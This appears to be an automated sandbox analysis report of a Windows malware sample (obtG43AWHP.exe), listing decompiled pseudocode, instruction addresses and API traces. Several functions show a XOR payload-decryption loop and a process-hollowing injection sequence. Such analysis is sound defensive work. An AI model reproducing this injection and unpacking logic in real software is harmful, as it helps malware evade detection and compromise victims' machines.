    Function 0041844E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
    C-Code - Quality: 50%
    			E0041844E() {
				struct _SYSTEM_INFO _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr* _t15;
				void* _t31;
				signed int _t34;
				void* _t38;
				void* _t39;
				void* _t45;
				void* _t51;

				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_push(_t45);
				_push(0x418517);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45 + 0xffffffd0;
				GetSystemInfo( &_v40);
				_t34 = 0;
				_t31 = 0x39a91;
				_t15 = 0x41944c;
				do {
					if(_t34 == 0x20) {
						_t34 = 0;
					}
					_t5 = (_t34 & 0x000000ff) + 0x452ee0; // 0x8845645c
					_t30 = ( *_t15 - _t34 ^  *_t5) + _t34;
					 *_t15 = ( *_t15 - _t34 ^  *_t5) + _t34;
					_t34 = _t34 + 1;
					_t15 = _t15 + 1;
					_t31 = _t31 - 1;
				} while (_t31 != 0);
				L5:
				_push("h`JE");
				_push("-t ");
				_push(0);
				E004070E8( &_v48, _t51, _v40.dwNumberOfProcessors >> 1);
				_push(_v48);
				_push(0x41853c);
				_push( *0x454a5c);
				E00404208();
				_push(_v44);
				E004029A4(0,  &_v52);
				_pop(_t38);
				E00417F5C(_v52, _t30, 0x41944c, _t38, _t39, _t42, _t51);
				goto L5;
			}














    0x0041845a
    0x0041845d
    0x00418460
    0x00418465
    0x00418466
    0x0041846b
    0x0041846e
    0x00418475
    0x0041847a
    0x0041847c
    0x00418481
    0x00418486
    0x00418489
    0x0041848b
    0x0041848b
    0x00418499
    0x0041849f
    0x004184a1
    0x004184a3
    0x004184a4
    0x004184a5
    0x004184a5
    0x004184a8
    0x004184a8
    0x004184ad
    0x004184b9
    0x004184be
    0x004184c3
    0x004184c6
    0x004184cb
    0x004184d9
    0x004184e1
    0x004184e7
    0x004184f4
    0x004184f5
    0x00000000

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 00418450, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59
    C-Code - Quality: 53%
    			E00418450() {
				struct _SYSTEM_INFO _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr* _t15;
				void* _t30;
				signed int _t33;
				void* _t37;
				void* _t38;
				intOrPtr _t42;
				void* _t47;

				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_push(0x418517);
				_push( *[fs:eax]);
				 *[fs:eax] = _t42;
				GetSystemInfo( &_v40);
				_t33 = 0;
				_t30 = 0x39a91;
				_t15 = 0x41944c;
				do {
					if(_t33 == 0x20) {
						_t33 = 0;
					}
					_t5 = (_t33 & 0x000000ff) + 0x452ee0; // 0x8845645c
					_t29 = ( *_t15 - _t33 ^  *_t5) + _t33;
					 *_t15 = ( *_t15 - _t33 ^  *_t5) + _t33;
					_t33 = _t33 + 1;
					_t15 = _t15 + 1;
					_t30 = _t30 - 1;
				} while (_t30 != 0);
				L4:
				_push("h`JE");
				_push("-t ");
				_push(0);
				E004070E8( &_v48, _t47, _v40.dwNumberOfProcessors >> 1);
				_push(_v48);
				_push(0x41853c);
				_push( *0x454a5c);
				E00404208();
				_push(_v44);
				E004029A4(0,  &_v52);
				_pop(_t37);
				E00417F5C(_v52, _t29, 0x41944c, _t37, _t38, _t40, _t47);
				goto L4;
			}














    0x0041845a
    0x0041845d
    0x00418460
    0x00418466
    0x0041846b
    0x0041846e
    0x00418475
    0x0041847a
    0x0041847c
    0x00418481
    0x00418486
    0x00418489
    0x0041848b
    0x0041848b
    0x00418499
    0x0041849f
    0x004184a1
    0x004184a3
    0x004184a4
    0x004184a5
    0x004184a5
    0x004184a8
    0x004184a8
    0x004184ad
    0x004184b9
    0x004184be
    0x004184c3
    0x004184c6
    0x004184cb
    0x004184d9
    0x004184e1
    0x004184e7
    0x004184f4
    0x004184f5
    0x00000000

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 0040BC54, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
    C-Code - Quality: 83%
    			E0040BC54(void* __edx) {
				void* _t6;
				void* _t13;
				void* _t17;
				void* _t20;
				void* _t21;
				void* _t22;

				_t17 = __edx;
				if(__edx != 0) {
					_t22 = _t22 + 0xfffffff0;
					_t6 = E00403404(_t6, _t21);
				}
				_t20 = _t6;
				E004030E4(0);
				 *((intOrPtr*)(_t20 + 0xc)) = 0xffff;
				 *((intOrPtr*)(_t20 + 0x10)) = CreateEventA(0, 0xffffffff, 0xffffffff, 0);
				 *((intOrPtr*)(_t20 + 0x14)) = CreateEventA(0, 0, 0, 0);
				 *(_t20 + 0x18) = 0xffffffff;
				 *((intOrPtr*)(_t20 + 0x20)) = E004030E4(1);
				_t13 = _t20;
				if(_t17 != 0) {
					E0040345C(_t13);
					_pop( *[fs:0x0]);
				}
				return _t20;
			}









    0x0040bc54
    0x0040bc58
    0x0040bc5a
    0x0040bc5d
    0x0040bc5d
    0x0040bc64
    0x0040bc6a
    0x0040bc6f
    0x0040bc83
    0x0040bc93
    0x0040bc96
    0x0040bca9
    0x0040bcac
    0x0040bcb0
    0x0040bcb2
    0x0040bcb7
    0x0040bcbe
    0x0040bcc5

    APIs
    • CreateEventA.KERNEL32(00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC7E
    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC8E
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 004179B4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9
    C-Code - Quality: 100%
    			E004179B4(void* __eax) {
				void* _t3;

				L0040C518();
				if(__eax != 0) {
					_t3 = E0040A56C("WSACleanup", 1);
					E0040386C();
					return _t3;
				}
				return __eax;
			}




    0x004179b4
    0x004179bb
    0x004179c9
    0x004179ce
    0x00000000
    0x004179ce
    0x004179d3

    APIs
    • WSACleanup.WSOCK32(00417A06,00000000,00417A14), ref: 004179B4
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 0040F0A8, Relevance: 5.1, Strings: 4, Instructions: 85
    C-Code - Quality: 78%
    			E0040F0A8(signed int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				void* _v8;
				char _v264;
				char _v520;
				char _v524;
				signed char _t47;
				intOrPtr* _t59;
				intOrPtr _t61;
				intOrPtr* _t75;
				void* _t78;

				_v524 = 0;
				_t75 = __edx;
				_t47 = __eax;
				_push(_t78);
				_push(0x40f1ce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t78 + 0xfffffdf8;
				_t73 = __eax & 0x00000fff;
				if((__eax & 0x00000fff) > 0x14) {
					if(__eax != 0x100) {
						if(__eax != 0x101) {
							if(E0040F504(__eax,  &_v8) == 0) {
								E00407110( &_v524, 4);
								_t59 =  *0x4530ec; // 0x419128
								E00404194(_t75, _v524,  *_t59);
							} else {
								E00403064( *_v8,  &_v520);
								E004027B4( &_v520, 0x7fffffff, 2,  &_v264);
								E004040EC(__edx,  &_v264);
							}
						} else {
							E00403EDC(__edx, 0x40f1f4);
						}
					} else {
						E00403EDC(__edx, "String");
					}
				} else {
					E00403EDC(__edx,  *((intOrPtr*)(0x419358 + (_t73 & 0x0000ffff) * 4)));
				}
				if((_t47 & 0x00000020) != 0) {
					E00404194(_t75,  *_t75, "Array ");
				}
				if((_t47 & 0x00000040) != 0) {
					E00404194(_t75,  *_t75, "ByRef ");
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0040F1D5);
				return E00403E88( &_v524);
			}












    0x0040f0b6
    0x0040f0bc
    0x0040f0be
    0x0040f0c2
    0x0040f0c3
    0x0040f0c8
    0x0040f0cb
    0x0040f0d0
    0x0040f0d9
    0x0040f0f6
    0x0040f10e
    0x0040f12a
    0x0040f175
    0x0040f180
    0x0040f18a
    0x0040f12c
    0x0040f13e
    0x0040f153
    0x0040f160
    0x0040f160
    0x0040f110
    0x0040f117
    0x0040f117
    0x0040f0f8
    0x0040f0ff
    0x0040f0ff
    0x0040f0db
    0x0040f0e7
    0x0040f0e7
    0x0040f192
    0x0040f19d
    0x0040f19d
    0x0040f1a5
    0x0040f1b0
    0x0040f1b0
    0x0040f1b7
    0x0040f1ba
    0x0040f1bd
    0x0040f1cd

    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 0041381C, Relevance: 5.1, Strings: 4, Instructions: 71
    C-Code - Quality: 82%
    			E0041381C(intOrPtr __eax, void* __ebx, char* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char* _t15;
				char* _t23;
				intOrPtr _t30;
				char _t31;
				intOrPtr _t39;
				intOrPtr _t42;
				void* _t45;

				_v12 = 0;
				_t23 = __edx;
				_push(_t45);
				_push(0x4138c2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45 + 0xfffffff8;
				_v8 = 0;
				if(__edx != 0) {
					_t39 = __eax;
					while( *_t23 != 0) {
						_t15 = _t23;
						while(1) {
							_t31 =  *_t23;
							if(_t31 == 0 || _t31 + 0xd3 - 2 < 0) {
								break;
							}
							_t23 = _t23 + 1;
						}
						E00403F78( &_v12, _t23 - _t15, _t15);
						_t42 = E004165D4(_t39, _t23 - _t15, _v12);
						if(_t42 == 0 && E00406E50(_v12, 0x4138dc) != 0) {
							_t42 = _t39;
						}
						if(_t42 != 0) {
							if( *_t23 == 0x2e) {
								_t23 = _t23 + 1;
							}
							if( *_t23 == 0x2d) {
								_t23 = _t23 + 1;
							}
							if( *_t23 == 0x3e) {
								_t23 = _t23 + 1;
							}
							_t39 = _t42;
							continue;
						}
						goto L19;
					}
					_v8 = _t39;
				}
				L19:
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(E004138C9);
				return E00403E88( &_v12);
			}












    0x00413827
    0x0041382a
    0x00413830
    0x00413831
    0x00413836
    0x00413839
    0x0041383e
    0x00413843
    0x00413845
    0x004138a4
    0x00413849
    0x0041384e
    0x0041384e
    0x00413852
    0x00000000
    0x00000000
    0x0041384d
    0x0041384d
    0x00413864
    0x00413873
    0x00413877
    0x0041388a
    0x0041388a
    0x0041388e
    0x00413893
    0x00413895
    0x00413895
    0x00413899
    0x0041389b
    0x0041389b
    0x0041389f
    0x004138a1
    0x004138a1
    0x004138a2
    0x00000000
    0x004138a2
    0x00000000
    0x0041388e
    0x004138a9
    0x004138a9
    0x004138ac
    0x004138ae
    0x004138b1
    0x004138b4
    0x004138c1

    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 0041498C, Relevance: 5.0, Strings: 4, Instructions: 50
    C-Code - Quality: 96%
    			E0041498C(void* __eax, void* __ecx, void* __edx) {
				signed int _t7;
				void* _t8;
				void* _t17;
				void* _t29;

				_push(__ecx);
				_t29 = __edx;
				_t17 = __eax;
				_t7 = E004155CC(__ecx) & 0x0000007f;
				if(_t7 > 0xd) {
					L7:
					_t8 = E00413A2C();
				} else {
					_t1 = _t7 + E004149B3; // 0x5
					switch( *((intOrPtr*)( *_t1 * 4 +  &M004149C1))) {
						case 0:
							goto L7;
						case 1:
							E00413F54(_t17, 1, _t30);
							E00403F78(_t29,  *_t30, 0);
							_t8 = E00413F54(_t17,  *_t30, E004043A0(_t29));
							goto L8;
						case 2:
							__eax = __esi;
							__edx = 0x414a58;
							__eax = E00403EDC(__esi, 0x414a58);
							goto L8;
						case 3:
							__eax = __esi;
							__edx = 0x414a68;
							__eax = E00403EDC(__esi, 0x414a68);
							goto L8;
						case 4:
							__eax = __esi;
							__edx = 0x414a78;
							__eax = E00403EDC(__esi, 0x414a78);
							goto L8;
						case 5:
							__eax = __esi;
							__edx = 0x414a84;
							__eax = E00403EDC(__esi, 0x414a84);
							goto L8;
					}
				}
				L8:
				return _t8;
			}







    0x0041498e
    0x0041498f
    0x00414991
    0x0041499a
    0x004149a0
    0x00414a44
    0x00414a44
    0x004149a6
    0x004149a6
    0x004149ac
    0x00000000
    0x00000000
    0x00000000
    0x004149e2
    0x004149f0
    0x00414a05
    0x00000000
    0x00000000
    0x00414a0c
    0x00414a0e
    0x00414a13
    0x00000000
    0x00000000
    0x00414a1a
    0x00414a1c
    0x00414a21
    0x00000000
    0x00000000
    0x00414a28
    0x00414a2a
    0x00414a2f
    0x00000000
    0x00000000
    0x00414a36
    0x00414a38
    0x00414a3d
    0x00000000
    0x00000000
    0x004149ac
    0x00414a49
    0x00414a4c

    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 0040AC28, Relevance: 5.0, Strings: 4, Instructions: 28
    C-Code - Quality: 100%
    			E0040AC28() {
				intOrPtr* _t5;
				intOrPtr* _t6;
				intOrPtr* _t7;
				intOrPtr* _t8;
				intOrPtr* _t9;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t16;
				intOrPtr* _t17;
				intOrPtr* _t18;

				_t12 =  *0x452f70; // 0x405e70
				 *0x45478c = E0040A628(_t12, 1);
				_t13 =  *0x453040; // 0x405ef0
				 *0x454790 = E0040A628(_t13, 1);
				_t5 =  *0x452f34; // 0x454008
				 *_t5 = 0x40a7a4;
				_t6 =  *0x452fa8; // 0x454004
				 *_t6 = E0040AC18;
				_t7 =  *0x452f64; // 0x45401c
				_t16 =  *0x406188; // 0x4061d4
				 *_t7 = _t16;
				_t8 =  *0x452f98; // 0x45400c
				 *_t8 = E0040A968;
				_t9 =  *0x452fac; // 0x454010
				 *_t9 = E0040AB4C;
				_t17 =  *0x453054; // 0x454020
				 *_t17 = E0040A8B4;
				_t18 =  *0x452f24; // 0x454028
				 *_t18 = E0040A8D0;
				return E0040A8D0;
			}













    0x0040ac28
    0x0040ac3a
    0x0040ac3f
    0x0040ac51
    0x0040ac56
    0x0040ac5b
    0x0040ac61
    0x0040ac66
    0x0040ac6c
    0x0040ac71
    0x0040ac77
    0x0040ac79
    0x0040ac7e
    0x0040ac84
    0x0040ac89
    0x0040ac94
    0x0040ac9a
    0x0040aca1
    0x0040aca7
    0x0040aca9

    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd

    Analysis Process: obtG43AWHP.exe PID: 3324 Parent PID: 3312

    Executed Functions

    Function 0020E080, Relevance: 16.7, APIs: 11, Instructions: 244
    APIs
    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0020E0C6
    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0020E0DC
    • CreateProcessA.KERNEL32(?,00000000), ref: 0020E1C2
    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0020E1F0
    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0020E235
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 0020E271
    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0020E297
    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 0020E306
    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0020E32C
    • SetThreadContext.KERNEL32(00000000,?), ref: 0020E34E
    • ResumeThread.KERNELBASE(00000000), ref: 0020E35A
    Memory Dump Source
    • Source File: 0000000F.00000002.1532164941.0020D000.00000040.sdmp, Offset: 0020D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_15_2_20d000_obtG43AWHP.jbxd
    Function 0020E380, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
    APIs
    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0020E493
    • PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0020E4B6
      • Part of subcall function 0020E080: VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0020E0C6
      • Part of subcall function 0020E080: GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0020E0DC
      • Part of subcall function 0020E080: CreateProcessA.KERNEL32(?,00000000), ref: 0020E1C2
      • Part of subcall function 0020E080: VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0020E1F0
    Strings
    Memory Dump Source
    • Source File: 0000000F.00000002.1532164941.0020D000.00000040.sdmp, Offset: 0020D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_15_2_20d000_obtG43AWHP.jbxd
    Function 0020E510, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
    APIs
    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 0020E54C
      • Part of subcall function 0020E380: CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0020E493
      • Part of subcall function 0020E380: PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0020E4B6
    Strings
    Memory Dump Source
    • Source File: 0000000F.00000002.1532164941.0020D000.00000040.sdmp, Offset: 0020D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_15_2_20d000_obtG43AWHP.jbxd

    Non-executed Functions

    Function 0020DFB2, Relevance: .1, Instructions: 61
    Memory Dump Source
    • Source File: 0000000F.00000002.1532164941.0020D000.00000040.sdmp, Offset: 0020D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_15_2_20d000_obtG43AWHP.jbxd

    Analysis Process: obtG43AWHP.exe PID: 3340 Parent PID: 3324

    Executed Functions

    Function 00404FC0, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184
    C-Code - Quality: 65%
    			E00404FC0(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x4050c5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00404E08( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040522C, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E004050CC);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L00401248();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401250();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L00401248();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L00401248();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L00401248();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























    0x00404fc1
    0x00404fc3
    0x00404fcb
    0x00404fdc
    0x00404fe1
    0x00404ffa
    0x00405001
    0x00405043
    0x00405045
    0x00405046
    0x0040504b
    0x0040504e
    0x00405051
    0x00405063
    0x00405086
    0x004050a6
    0x004050a6
    0x004050aa
    0x004050b0
    0x004050b3
    0x004050b6
    0x004050c4
    0x00405003
    0x00405018
    0x0040501f
    0x00000000
    0x00405021
    0x00405036
    0x0040503d
    0x004050cc
    0x004050d4
    0x004050db
    0x004050dc
    0x004050ef
    0x004050f4
    0x004050fd
    0x00405113
    0x00405119
    0x0040511a
    0x00405127
    0x0040512c
    0x0040512b
    0x0040512b
    0x0040513b
    0x00405143
    0x00405149
    0x0040514e
    0x0040515b
    0x0040515f
    0x00405160
    0x00405161
    0x00405176
    0x00405176
    0x0040517a
    0x00405193
    0x00405197
    0x00405198
    0x00405199
    0x004051a9
    0x004051ae
    0x004051b2
    0x004051b4
    0x004051c9
    0x004051cd
    0x004051ce
    0x004051cf
    0x004051df
    0x004051e4
    0x004051e4
    0x004051b2
    0x0040517a
    0x00405143
    0x004051ed
    0x00000000
    0x00000000
    0x00000000
    0x0040503d
    0x0040501f

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404E08: GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
      • Part of subcall function 00404E08: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
